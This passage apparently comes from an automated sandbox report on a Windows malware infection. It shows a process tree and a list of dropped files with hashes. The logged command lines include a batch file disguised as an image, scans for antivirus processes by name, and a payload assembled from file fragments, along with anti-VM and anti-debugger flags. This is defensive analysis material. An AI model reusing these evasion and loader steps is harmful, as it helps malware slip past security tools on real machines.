            • C:\Users\Admin\AppData\Local\Temp\10473410101\TbV75ZR.exe
              "C:\Users\Admin\AppData\Local\Temp\10473410101\TbV75ZR.exe"
              4⤵
                PID:5532
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  5⤵
                    PID:9316
                • C:\Users\Admin\AppData\Local\Temp\10473420101\larBxd7.exe
                  "C:\Users\Admin\AppData\Local\Temp\10473420101\larBxd7.exe"
                  4⤵
                    PID:7596
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\System32\cmd.exe" /c copy Cattle.psd Cattle.psd.bat & Cattle.psd.bat
                      5⤵
                        PID:9188
                        • C:\Windows\SysWOW64\tasklist.exe
                          tasklist
                          6⤵
                          • Enumerates processes with tasklist
                          PID:11192
                        • C:\Windows\SysWOW64\findstr.exe
                          findstr /I "opssvc wrsa"
                          6⤵
                            PID:11296
                          • C:\Windows\SysWOW64\tasklist.exe
                            tasklist
                            6⤵
                            • Enumerates processes with tasklist
                            PID:10040
                          • C:\Windows\SysWOW64\findstr.exe
                            findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
                            6⤵
                              PID:10092
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd /c md 689912
                              6⤵
                                PID:10372
                              • C:\Windows\SysWOW64\extrac32.exe
                                extrac32 /Y /E Exclusion.psd
                                6⤵
                                  PID:10704
                                • C:\Windows\SysWOW64\findstr.exe
                                  findstr /V "users" Findarticles
                                  6⤵
                                    PID:11144
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /c copy /b 689912\Jordan.com + Bg + Batteries + Boss + Illustrations + Boards + Within + Pushed + Brunei + Dead 689912\Jordan.com
                                    6⤵
                                      PID:13068
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd /c copy /b ..\Customized.psd + ..\Permits.psd + ..\Teeth.psd + ..\Feel.psd + ..\Nonprofit.psd + ..\Shoes.psd + ..\Bruce.psd b
                                      6⤵
                                        PID:4976
                                      • C:\Users\Admin\AppData\Local\Temp\689912\Jordan.com
                                        Jordan.com b
                                        6⤵
                                          PID:14044
                                        • C:\Windows\SysWOW64\choice.exe
                                          choice /d y /t 5
                                          6⤵
                                            PID:12336
                                      • C:\Users\Admin\AppData\Local\Temp\10473430101\9sWdA2p.exe
                                        "C:\Users\Admin\AppData\Local\Temp\10473430101\9sWdA2p.exe"
                                        4⤵
                                          PID:10260
                                        • C:\Users\Admin\AppData\Local\Temp\10473440101\qhjMWht.exe
                                          "C:\Users\Admin\AppData\Local\Temp\10473440101\qhjMWht.exe"
                                          4⤵
                                            PID:13216
                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                        2⤵
                                        • System Location Discovery: System Language Discovery
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:5520
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
                                        2⤵
                                          PID:2400
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
                                          2⤵
                                            PID:1000
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\{d571250f-8145-4cdc-9f6a-29f78b5f2dc0}\ca3545b3-8509-42e3-acfd-493c586a5d64.cmd"0
                                            2⤵
                                              PID:9944
                                          • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                            C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                            1⤵
                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                            • Checks BIOS information in registry
                                            • Executes dropped EXE
                                            • Identifies Wine through registry keys
                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                            • Suspicious behavior: EnumeratesProcesses
                                            PID:5876
                                          • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                            C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                            1⤵
                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                            • Checks BIOS information in registry
                                            • Executes dropped EXE
                                            • Identifies Wine through registry keys
                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                            • Suspicious behavior: EnumeratesProcesses
                                            PID:13896
                                          • C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                                            C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                                            1⤵
                                            • Executes dropped EXE
                                            PID:14136
                                          • C:\Users\Admin\AppData\Roaming\Mode\IsValueCreated.exe
                                            C:\Users\Admin\AppData\Roaming\Mode\IsValueCreated.exe
                                            1⤵
                                            • Executes dropped EXE
                                            • Suspicious use of SetThreadContext
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:6392
                                            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
                                              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
                                              2⤵
                                                PID:11740
                                            • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                              C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                              1⤵
                                                PID:10684
                                              • C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                                                C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                                                1⤵
                                                  PID:12948

                                                Network

                                                MITRE ATT&CK Enterprise v15

                                                Replay Monitor

                                                Loading Replay Monitor...

                                                Downloads

                                                • C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe

                                                  Filesize

                                                  1.9MB

                                                  MD5

                                                  bcbec32483eb43840823c4f6bd653779

                                                  SHA1

                                                  3b83255512c5f268d0a1cb2997b1cc9d40f4252d

                                                  SHA256

                                                  d8a8e71a2be6d5fafa5d49029a37751c78be7e007152859233b8020a5c258167

                                                  SHA512

                                                  4cb807157807c72d599305eada37e85330314e43061f9af3ab9c44839bfc945431e320adf5259b9a9ecb531368cd9ab91d047eb8874f0ce6a8d4022ed69a6408

                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\0CMYC78C\service[1].htm

                                                  Filesize

                                                  1B

                                                  MD5

                                                  cfcd208495d565ef66e7dff9f98764da

                                                  SHA1

                                                  b6589fc6ab0dc82cf12099d1c2d40ab994e8410c

                                                  SHA256

                                                  5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

                                                  SHA512

                                                  31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\0CMYC78C\soft[1]

                                                  Filesize

                                                  3.0MB

                                                  MD5

                                                  866664b3ce72c7dad2ffc552282ddd7c

                                                  SHA1

                                                  43404be154db8ee32dc7c59de01f015235e44de2

                                                  SHA256

                                                  630af8886f6e7b8cb7b530ed641a4ddf20eec3bedd2a5aa60285b5a5805a603a

                                                  SHA512

                                                  a0b5eb5438cedaa60b6f23ea9daaa3e71cddfca906f933f3a3a44d04cb63427a1fb6ea4153bf4027d767ef5620ab0e6712257f3ea5e508d74662f1596dfcc712

                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\IKSTFXHA\dll[1]

                                                  Filesize

                                                  236KB

                                                  MD5

                                                  2ecb51ab00c5f340380ecf849291dbcf

                                                  SHA1

                                                  1a4dffbce2a4ce65495ed79eab42a4da3b660931

                                                  SHA256

                                                  f1b3e0f2750a9103e46a6a4a34f1cf9d17779725f98042cc2475ec66484801cf

                                                  SHA512

                                                  e241a48eafcaf99187035f0870d24d74ae97fe84aaadd2591cceea9f64b8223d77cfb17a038a58eadd3b822c5201a6f7494f26eea6f77d95f77f6c668d088e6b

                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                  Filesize

                                                  944B

                                                  MD5

                                                  454c5c4b128d34aee2eb765f2a9c0aa9

                                                  SHA1

                                                  4b6e92db79d964f604fd6b261b3b19ede2aea8a5

                                                  SHA256

                                                  e1e65d1697b9ac59805f677cbc8eec623a899b75b1389354f0948ad3c1513772

                                                  SHA512

                                                  17b4e146ef4f8862d06ac975204cca9ef9b077420256df92d94409715b18efb4dc63879154c1c234317a169ac63024ed43b5cb52473882dc46c588af089f25d6

                                                • C:\Users\Admin\AppData\Local\Temp\10052940101\3660442840.exe

                                                  Filesize

                                                  4.4MB

                                                  MD5

                                                  e1e2da6b5cd813d7f0ec3f00990ae47f

                                                  SHA1

                                                  a256358da54ef7e8fd065842fa592ee82f2fd3cf

                                                  SHA256

                                                  baf5e2a07be7d2663cb6ef113dd31328c69f7307fd189145189f46cc1bcd37df

                                                  SHA512

                                                  60c3454f7f242379528739cded5a0d45036c72b5e1027aeccad668e4d50fa50a737c095fc7eeddcc1b0e1649476f8305c0c66fa22e45c1711ad0af8965a28bba

                                                • C:\Users\Admin\AppData\Local\Temp\10052950101\557dbebffe.exe

                                                  Filesize

                                                  5.9MB

                                                  MD5

                                                  e05432c13d42b8526ce4bc0dc240d297

                                                  SHA1

                                                  db6e9382425055030662ecdc95d6405d30dcf82a

                                                  SHA256

                                                  574c5ba90e69460799a53ea6fc88d8c6ba4b2b749f739f61779e1975e53e15d9

                                                  SHA512

                                                  56ad65cc3608f67b680599f8769a0bb0a8b16bdaaf62569c517fa54e72c12671d57472c1e88baaa13cf69a95b84887c527cba666abbca61a923d380dd71481ee

                                                • C:\Users\Admin\AppData\Local\Temp\10473270101\518e903f2f.exe

                                                  Filesize

                                                  1.8MB

                                                  MD5

                                                  e5ce7c7822d6ae95ea7df9a6bec47195

                                                  SHA1

                                                  1d52d18943beed15b7354731c7073ca0e05bd991

                                                  SHA256

                                                  d774cec2801f9e42a38553dcc558e80cdd83b5e89aebde3a6528d695f105b85a

                                                  SHA512

                                                  68f5d360a1e8c505431238b825fe8d0c461e99fc78884005517fec13d5a494ddb771a06a8bdc544e734744b90b9ef223284ef6f6d77c67f70666728599cae562

                                                • C:\Users\Admin\AppData\Local\Temp\10473280101\wQI4o11.exe

                                                  Filesize

                                                  5.5MB

                                                  MD5

                                                  d66272143362242811fc9849c98b47b5

                                                  SHA1

                                                  17194970bbfe4ef0402f413fce909c3ae57e5342

                                                  SHA256

                                                  c29d978e33e1d80eb188cff6ebebd0a576480871a0c173f8132a7b14383a50a9

                                                  SHA512

                                                  9aa0267466e63c69c651a5ffd9fb0ea8285bcf7f6b6a2d72d53e8af04c8077aca2b4839d5721a9ec4a3a55a4a6675cc4e1a9950ae4f85e67bf9b6e19d1a772dd

                                                • C:\Users\Admin\AppData\Local\Temp\10473290101\VrQSuEQ.exe

                                                  Filesize

                                                  584KB

                                                  MD5

                                                  c5d9e2e38334a86e8f50dfb92e895e11

                                                  SHA1

                                                  723b222dce3677b76fda3754c7d58dcf60a7ee3a

                                                  SHA256

                                                  4d78fb22cc89fa243a5b356ee029331d52e047aac72595fb2d0e66fc6d2943dd

                                                  SHA512

                                                  65952a94ab63f509b98211db5f5544f8d962e0f9441381be0584498e5031adb5259d5ea3ab79804ed685ebd2ba162612f519bdbd580aa21d0352e1a3f05103b1

                                                • C:\Users\Admin\AppData\Local\Temp\10473300101\amnew.exe

                                                  Filesize

                                                  429KB

                                                  MD5

                                                  22892b8303fa56f4b584a04c09d508d8

                                                  SHA1

                                                  e1d65daaf338663006014f7d86eea5aebf142134

                                                  SHA256

                                                  87618787e1032bbf6a6ca8b3388ea3803be20a49e4afaba1df38a6116085062f

                                                  SHA512

                                                  852dcc1470f33bc601a814f61a37c1f5a10071ff3354f101be0ef9aa5ac62b4433a732d02acd4247c2a1819fef9adef7dd6722ee8eb9e8501bac033eb877c744

                                                • C:\Users\Admin\AppData\Local\Temp\10473310101\UZPt0hR.exe

                                                  Filesize

                                                  1.2MB

                                                  MD5

                                                  bf6f64455cb1039947a3100e62f96a52

                                                  SHA1

                                                  28cdd5c2e82d4ad078420dcbf4b32b928861fcb6

                                                  SHA256

                                                  c81ece0b60ed50db7d3769388f34ba051a05c95bd026e78dabb6ce08ff91bbba

                                                  SHA512

                                                  c2ceb000b387710cf388e6699a2cb4465380bf5798d9f37c238db0701aaea6ccad1f44e6b9e45398050202ef875a5d7679890df2bb65538a0c8a9655c62c185b

                                                • C:\Users\Admin\AppData\Local\Temp\10473320101\a1e032013f.exe

                                                  Filesize

                                                  2.1MB

                                                  MD5

                                                  b716eeac8d2b82a187470f85b1db47af

                                                  SHA1

                                                  c9bd99c909c0f0d11aaf0883f8c8a10e3cc20b3f

                                                  SHA256

                                                  410b45fbefb6d7774958ce3836396a2f8b67084358b609da0080f4dcccb33a83

                                                  SHA512

                                                  28476e788b7e7ed90d7b3e6a21b75edb0ee86ea970ffeedf76360cd0d043c76beddd2c55f3850e5fafac34abecda87787ca9a54f39eee10e2f681c8b44c01519

                                                • C:\Users\Admin\AppData\Local\Temp\10473340101\RYZusWg.exe

                                                  Filesize

                                                  655KB

                                                  MD5

                                                  922e963ce085b717f4d3818a1f340d17

                                                  SHA1

                                                  ce250046d0587889ad29f485fbf0e97692156625

                                                  SHA256

                                                  bf5d1dd6ea5f4af043069d12699f9352af431ce3cdff633ff227eec441244bca

                                                  SHA512

                                                  689b6afe8755a81c428e76dadac66cfee8f81afd6fabf386cc1d1ed836c09fe318844964120f25e445fbd03995708f91609194961c9753362b6563f603fad1ee

                                                • C:\Users\Admin\AppData\Local\Temp\10473351121\ccosvAs.cmd

                                                  Filesize

                                                  1.4MB

                                                  MD5

                                                  2f0f5fb7efce1c965ff89e19a9625d60

                                                  SHA1

                                                  622ff9fe44be78dc07f92160d1341abb8d251ca6

                                                  SHA256

                                                  426b6e77a4d2e72edf8cd6177578a732ca05510b56cb58d938d6e25820dc2458

                                                  SHA512

                                                  b8587d32e98693f08c9c3776ac4168204d76dd6db0d76c6afc815d6727d745f6137ae83fe85a7562517b37c320ddebc27167a9f3f14dacca33954dbe437dc920

                                                • C:\Users\Admin\AppData\Local\Temp\10473360101\n0hEgR9.exe

                                                  Filesize

                                                  1.1MB

                                                  MD5

                                                  3f986040ea150bfb24408c7f5677289d

                                                  SHA1

                                                  cee2ff576ec34b152ae9b7390c327fcf931fd372

                                                  SHA256

                                                  fcf94c18fbd9114e3a71142b47952f8e1cf81ef2a8a58f484d175f337d717235

                                                  SHA512

                                                  ff4cae88022f2a686d33629d80999fde444ede2755f3868a4096bde2b08360da8387ac046e116bf5e6d6bc7b4a352b33ebefc606502f7ffb41c440d638f2e07f

                                                • C:\Users\Admin\AppData\Local\Temp\10473370101\Rm3cVPI.exe

                                                  Filesize

                                                  354KB

                                                  MD5

                                                  27f0df9e1937b002dbd367826c7cfeaf

                                                  SHA1

                                                  7d66f804665b531746d1a94314b8f78343e3eb4f

                                                  SHA256

                                                  aff35e23562fc36f4b8f6b5bf95eb5dbf11e8af6674e3212aa0c4077ddfe8209

                                                  SHA512

                                                  ee4e7e5a8ffe193a8487dd4e9bfb13affa74cacdf250a4e22ed0fc653bbfb615855771dd41d295be905bed311c1690874ce61a5a9d9a5745b4bc550715c7de17

                                                • C:\Users\Admin\AppData\Local\Temp\10473380101\mTk60rz.exe

                                                  Filesize

                                                  11.6MB

                                                  MD5

                                                  e717d08f2813115fea75f3423b85bbce

                                                  SHA1

                                                  38da94cd4447748b80e919c13108ac61cd67c486

                                                  SHA256

                                                  cf7e773ff75c1b2f3df3a804eef95b68e5f9e5c3954cb60e85916da9512757c1

                                                  SHA512

                                                  b6912bd37710a68e754822c50d4ad9b5dd359b52bc226ea699829af36161dc2ce69014919f0a8cbfe2211ceb8de2128eed2169d2e92f577405234b05191c822f

                                                • C:\Users\Admin\AppData\Local\Temp\10473390101\f050f8d759.exe

                                                  Filesize

                                                  1.8MB

                                                  MD5

                                                  38d82333308ff47f5a0533da24ed0a63

                                                  SHA1

                                                  e8f43f283a350627e550fd1bace20aa928b6ee1b

                                                  SHA256

                                                  b8b4c82e29d044563f9eff2f0bda6ff302d0f83070e6959c0ec1901707b6d76d

                                                  SHA512

                                                  326fdcaeb871d83091334677231ab29900835054759f15b452157c7def0cdd301f9f4507acd41d972e466b15e2106b1ec4efb5ad8c746cf2d26a0ba900832e72

                                                • C:\Users\Admin\AppData\Local\Temp\10473410101\TbV75ZR.exe

                                                  Filesize

                                                  1.9MB

                                                  MD5

                                                  b53f9756f806ea836d98ff3dc92c8c84

                                                  SHA1

                                                  05c80bd41c04331457374523d7ab896c96b45943

                                                  SHA256

                                                  73ca9bc319d447e03a717b4f781aca8dc11a5bec82ace59751f285341e4b137c

                                                  SHA512

                                                  bd776a3f3ae229fb36f54674323ddeea0a631acfc18578860ed282667fcc5047d2b5033aba4f88f5908d909d0969081a94cb1cb3efbb9ecaeff526c0fb2ecddb

                                                • C:\Users\Admin\AppData\Local\Temp\10473420101\larBxd7.exe

                                                  Filesize

                                                  1.2MB

                                                  MD5

                                                  4641a0bec2101c82f575862f97be861c

                                                  SHA1

                                                  0dd1ee06cdb7ba9ef2aa1dc44c80f1bc2586d33b

                                                  SHA256

                                                  fc2ac17498bd7846607110e66426bdad0ab5302f5c7978dd72c20d99166292e1

                                                  SHA512

                                                  da87190b368b99feafdb6cfb2fe236c94741573f494ca1cc9127f3a34e9112e1c8d4bf794841b4f00d3f083bc8239226d7d6ffecb45eb02299ff4e03e6e3749a

                                                • C:\Users\Admin\AppData\Local\Temp\10473430101\9sWdA2p.exe

                                                  Filesize

                                                  1.1MB

                                                  MD5

                                                  5adca22ead4505f76b50a154b584df03

                                                  SHA1

                                                  8c7325df64b83926d145f3d36900b415b8c0fa65

                                                  SHA256

                                                  aa7105a237dc64c8eb179f18d54641e5d7b9ab7da7bf71709a0d773f20154778

                                                  SHA512

                                                  6192d61e777c59aa80c236b2f3e961795b7ff9971327c4e3270803d356ecf38949811df680a372259a9638ccdb90fc1271fb844f1f35656d5b317c96081f396e

                                                • C:\Users\Admin\AppData\Local\Temp\10473440101\qhjMWht.exe

                                                  Filesize

                                                  5.8MB

                                                  MD5

                                                  1dbdcaeaac26f7d34e872439997ee68d

                                                  SHA1

                                                  18c855f60fb83306f23634b10841655fb32a943b

                                                  SHA256

                                                  3142aecf9794be2f3894d3e1429d28f80918c5b41d516c9160e7cd3984a6f5a3

                                                  SHA512

                                                  aa447551d1d44d8b615a3d8a656c4085d024cc72fa9ead0b944c72dd7ff5bdab60fd7829440d9c2b4b2de364ca33d349e5716699e2cefd4835e35bbc7e421535

                                                • C:\Users\Admin\AppData\Local\Temp\10473450101\YMauSAr.exe

                                                  Filesize

                                                  2.8MB

                                                  MD5

                                                  e28b4428ddaca22e268d5738bfed1bdf

                                                  SHA1

                                                  7038514c3ff9fc511dcf7307b8206eb47aee97d4

                                                  SHA256

                                                  3d69aa8d7e885cb94281b7b542a0b9fcf60ad0d597e21112822624f3357fd216

                                                  SHA512

                                                  257f4bd7c25d70b681afcb021b7c6aa1b02215a7ff0272930e296dfbc930a7f164daaf1aa4c100f32eed5e2de358275ddc7ce4ae8b50e06a280828bab3ebff7f

                                                • C:\Users\Admin\AppData\Local\Temp\Cattle.psd.bat

                                                  Filesize

                                                  11KB

                                                  MD5

                                                  ec90ed340e87d540b3b2bfd46026424c

                                                  SHA1

                                                  94d88488e005158000815c918c59e868f221a1c6

                                                  SHA256

                                                  80f117d62a42a9c74efb37e180cc85796f56e3eedc76c5b8962837fb964f32e0

                                                  SHA512

                                                  57d231bae221e173fb8707638292ab69fd222760c4da4404dea0c392e442d53f92381ef23608c4e4caa1c779b987e20b98a50d2c2b96c0354fda2700ad6388d6

                                                • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_libtxwow.tua.ps1

                                                  Filesize

                                                  60B

                                                  MD5

                                                  d17fe0a3f47be24a6453e9ef58c94641

                                                  SHA1

                                                  6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                  SHA256

                                                  96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                  SHA512

                                                  5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

                                                  Filesize

                                                  1.8MB

                                                  MD5

                                                  9476089ee6fba4b4b9bafff79b0afef2

                                                  SHA1

                                                  253b4cd213a01ca14a873e71fa3a80dffe43f078

                                                  SHA256

                                                  fdfec811dd5f93757f3ea461d6e06a872fae95e1fea78c8d8932968f992698b9

                                                  SHA512

                                                  64e501f6f47f018e7725273b1fa59d4f3906d212955011c2e0720f40321bdf2345358af097b1d482e596a796b1583f0a35acb0cb79e33018b4ce6bcb99060784

                                                • C:\Users\Admin\AppData\Local\Temp\etmp13D49C67-2EC8-EC49-8A75-C38BCB7D059C

                                                  Filesize

                                                  184KB

                                                  MD5

                                                  f6b201c0a6590abd8317db7a8c809497

                                                  SHA1

                                                  00594c9cd598445695010bb612bd39ff9b670b98

                                                  SHA256

                                                  fa3f38be58cca69465b15a70d0037ec1f2586b27346e51d0cc32998805308c51

                                                  SHA512

                                                  114a40e07debfc9bd31f903b32129a89c4af57954508af4e30a33f611e5876b79b1b52fe40f79dc917f621b9235078605097e76ba23e19fcfea15e902d694ebb

                                                • C:\Users\Admin\AppData\Local\Temp\etmp585D48B1-0152-794C-A67C-1243AC6D2DC7

                                                  Filesize

                                                  76KB

                                                  MD5

                                                  872b77b21cf187df83d7b49e74072863

                                                  SHA1

                                                  d2b64ac575f97b324fd5cccd34a343fb538d2b4d

                                                  SHA256

                                                  8b72eb7b32e2384c9c0a2eac99be6582475c55ab7808d59527a602b3e77432f8

                                                  SHA512

                                                  8b446e4fe8bec63176da22aefe91bfb9b7d19e3342771e09b8854cad40345e75c074f18b6030786fe2d4f6e7a04fa4e0ccabab95d86b3829da246afbad91e315

                                                • C:\Users\Admin\AppData\Local\Temp\etmp93AEBBC1-1D76-2343-BC01-8B1CB299346D

                                                  Filesize

                                                  1.3MB

                                                  MD5

                                                  53df3b1d2da54bb5e4556da873105c25

                                                  SHA1

                                                  59178efbe2b1741fbfa773a2ceb489937cc22d75

                                                  SHA256

                                                  525d1c0bed6568eb3a0407f9ce55f0c557675c6e65ec27b71d3bc9f2c9c909bf

                                                  SHA512

                                                  3d54aee816cca54ba037d944e4eb6097fb1c4fdce8f03bb8a87503b4fb785c8349f7138bd59a87133199566301498fb78275e4ce408e5930b228ed6f87d67733

                                                • C:\Users\Admin\AppData\Local\Temp\etmp93DD54F0-E8B3-F947-9570-92F75BB6F93B

                                                  Filesize

                                                  4.4MB

                                                  MD5

                                                  41ccc1a98c9d93d241fa88c621209769

                                                  SHA1

                                                  e828af42b549fdd624ac4fb7ba219121917e5a5f

                                                  SHA256

                                                  1f62a9fd0209dcb1d50f0c45f4506595dcb1dd1bd16208650f0b40ae498d04cb

                                                  SHA512

                                                  492cef477259fc3ce04330f95d4dc0b01ab1aca67abd94941ea6b9e8a246709f110d551c4c2928d16b6b3c3771ed9d448c0b083915e488b1564c88013abaebd7

                                                • C:\Users\Admin\AppData\Local\Temp\etmpAA4CA1D3-DFB5-284D-AE68-AB7FD5EEF190

                                                  Filesize

                                                  4.4MB

                                                  MD5

                                                  44c06323d3dd880acbc1f65feacae0dd

                                                  SHA1

                                                  a9a037a70d92724ba24ac0e30df2b1c22e3545fc

                                                  SHA256

                                                  c9c2178cde6135b9b86b85c15c37ff80368477a1916dc83eb65627b245e46b01

                                                  SHA512

                                                  1d80d6c43e7713b198f88481fad00c37bfb4188933a6602efea326ef7ff30ec89d3d176efdf59455057d9ba2e79495a17521ca6643daf0fe7f4e2ea551d49e08

                                                • C:\Users\Admin\AppData\Local\Temp\etmpD8F0FE76-1656-104A-8E3E-09AAAD524CC2

                                                  Filesize

                                                  4.4MB

                                                  MD5

                                                  99cf21891c5e3c0b68fb24d464a7f130

                                                  SHA1

                                                  a2fad62bab69d792dbca584c2b1814996cc49372

                                                  SHA256

                                                  3c1914c41e881f80ecfda0ec9f7ed8d60874c8231b805c02181f00c4bcb96cbd

                                                  SHA512

                                                  71a20fb56cb5d922453140d5c2a57d885ea8f46ccef3169c6d7801a606c4aafc9b524f1c7805acfca5fd409592cc5c23a861910868fffe636e2a8e372664972e

                                                • C:\Users\Admin\AppData\Local\Temp\svchost015.exe

                                                  Filesize

                                                  2.9MB

                                                  MD5

                                                  b826dd92d78ea2526e465a34324ebeea

                                                  SHA1

                                                  bf8a0093acfd2eb93c102e1a5745fb080575372e

                                                  SHA256

                                                  7824b50acdd144764dac7445a4067b35cf0fef619e451045ab6c1f54f5653a5b

                                                  SHA512

                                                  1ac4b731b9b31cabf3b1c43aee37206aee5326c8e786abe2ab38e031633b778f97f2d6545cf745c3066f3bd47b7aaf2ded2f9955475428100eaf271dd9aeef17

                                                • C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe

                                                  Filesize

                                                  1.3MB

                                                  MD5

                                                  15bdc4bd67925ef33b926843b3b8154b

                                                  SHA1

                                                  646af399ef06ac70e6bd43afe0f978f0f51a75fd

                                                  SHA256

                                                  4f0b2c61bccfd9aa3db301ee4e15607df41ded533757de34c986a0ff25b6246d

                                                  SHA512

                                                  eac0736a06d0835758318d594d3560ee6be82889020a173463943956dd400d08cf1174a4c722dc45a3f3c034131982f4b19ff27db1163838afbfac37f397eaf8

                                                • C:\Users\Admin\AppData\Local\Temp\{ba415f69-f304-48ca-b06c-f00ce9cdd0e3}\Bases\arkmon64.drv

                                                  Filesize

                                                  390KB

                                                  MD5

                                                  7c924dd4d20055c80007791130e2d03f

                                                  SHA1

                                                  072f004ddcc8ddf12aba64e09d7ee0ce3030973e

                                                  SHA256

                                                  406ab7d6e45dbedcfbd2d7376a643620c7462cece3e41115c8fbc07861177ec6

                                                  SHA512

                                                  ab26005da50cbf1f45129834cb661b5b97aed5637d4ebc9821c8b744ff61c3f108f423ae5628602d99b3d859e184bfb23900797538dca2891186321d832ea806

                                                • C:\Users\Admin\AppData\Local\Temp\{ba415f69-f304-48ca-b06c-f00ce9cdd0e3}\KVRT.exe

                                                  Filesize

                                                  2.6MB

                                                  MD5

                                                  3fb0ad61548021bea60cdb1e1145ed2c

                                                  SHA1

                                                  c9b1b765249bfd76573546e92287245127a06e47

                                                  SHA256

                                                  5d1a788260891c317f9d05b3387e732af908959c5ad4f5a84e7984bee71084f1

                                                  SHA512

                                                  38269c22fda1fdee5906c2bfdfc19b77b5f6d8da2be939c6d8259b536912f8bc6f261f5c508f47ade8ab591a54aafbfbcc302219820bad19feb78fcc3586d331

                                                • C:\Users\Admin\AppData\Local\Temp\{ba415f69-f304-48ca-b06c-f00ce9cdd0e3}\MSVCP140.dll

                                                  Filesize

                                                  439KB

                                                  MD5

                                                  5ff1fca37c466d6723ec67be93b51442

                                                  SHA1

                                                  34cc4e158092083b13d67d6d2bc9e57b798a303b

                                                  SHA256

                                                  5136a49a682ac8d7f1ce71b211de8688fce42ed57210af087a8e2dbc8a934062

                                                  SHA512

                                                  4802ef62630c521d83a1d333969593fb00c9b38f82b4d07f70fbd21f495fea9b3f67676064573d2c71c42bc6f701992989742213501b16087bb6110e337c7546

                                                • C:\Users\Admin\AppData\Local\Temp\{ba415f69-f304-48ca-b06c-f00ce9cdd0e3}\VCRUNTIME140.dll

                                                  Filesize

                                                  78KB

                                                  MD5

                                                  a37ee36b536409056a86f50e67777dd7

                                                  SHA1

                                                  1cafa159292aa736fc595fc04e16325b27cd6750

                                                  SHA256

                                                  8934aaeb65b6e6d253dfe72dea5d65856bd871e989d5d3a2a35edfe867bb4825

                                                  SHA512

                                                  3a7c260646315cf8c01f44b2ec60974017496bd0d80dd055c7e43b707cadba2d63aab5e0efd435670aa77886ed86368390d42c4017fc433c3c4b9d1c47d0f356

                                                • C:\Users\Admin\AppData\Local\Temp\{ba415f69-f304-48ca-b06c-f00ce9cdd0e3}\app_core.dll

                                                  Filesize

                                                  1.3MB

                                                  MD5

                                                  fe0964663cf9c5e4ff493198e035cc1f

                                                  SHA1

                                                  ab9b19bd0e4efa36f78d2059b4ca556521eb35cb

                                                  SHA256

                                                  ddd70011d86b8ec909295ef45f94b48b0252229b6182af9ef8a6029c30daaf39

                                                  SHA512

                                                  923cfd9143d3850357bda901f66b5292f36ff025f05b2156667873861a02d9f498a03cdb73d2c477c0055d46600628f936b70dec46d7687fe0a97cbb1c8cf0ea

                                                • C:\Users\Admin\AppData\Local\Temp\{ba415f69-f304-48ca-b06c-f00ce9cdd0e3}\config.esm

                                                  Filesize

                                                  51KB

                                                  MD5

                                                  184a351c4d532405206e309c10af1d15

                                                  SHA1

                                                  3cf49f2275f3f9bd8e385eddcdd04e3fc2a17352

                                                  SHA256

                                                  ef0b7e22d8f7bd06964969a7f2979a475ba1c9c34efccb0c3b9e03ae950c63f6

                                                  SHA512

                                                  9a1a3cb0e3713ba41f36f4f01f2151b0c04454a05c986215ed2cc42180994f90d10e031d77452a2d0ad5a78f15d8d31c327d0d1ee676789780e6483dbe5e0341

